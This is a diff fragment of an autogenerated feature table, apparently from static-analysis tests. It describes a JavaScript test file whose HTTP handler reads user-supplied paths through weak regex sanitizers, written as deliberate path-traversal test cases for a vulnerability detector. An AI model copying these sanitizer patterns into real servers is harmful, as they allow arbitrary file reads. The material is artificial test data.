sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | path.re ... /g, '') | calleeImports | fs | @@ -6136,6 +64219,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:173:29:173:51 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:173:34:173:40 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:34:173:40 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:173:34:173:40 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:173:34:173:40 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:173:34:173:40 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:173:42:173:46 | /\\//g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:173:42:173:46 | /\\//g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:173:42:173:46 | /\\//g | calleeImports | url | @@ -6154,6 +64242,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:173:49:173:50 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:173:49:173:50 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:173:49:173:50 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:56 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:56 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:56 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:56 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:56 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:56 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:56 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:56 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:56 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:3:174:56 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:174:7:174:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:7:174:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:7:174:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:7:174:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:7:174:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6162,6 +64290,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:174:13:174:55 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:174:16:174:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:16:174:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:16:174:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:16:174:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:16:174:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:40 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:40 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:40 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:40 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:40 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | path.re ... /g, '') | calleeImports | fs | @@ -6171,6 +64319,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:174:29:174:54 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:174:34:174:40 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:34:174:40 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:174:34:174:40 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:174:34:174:40 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:174:34:174:40 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:174:42:174:49 | /\\.\|\\//g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:174:42:174:49 | /\\.\|\\//g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:174:42:174:49 | /\\.\|\\//g | 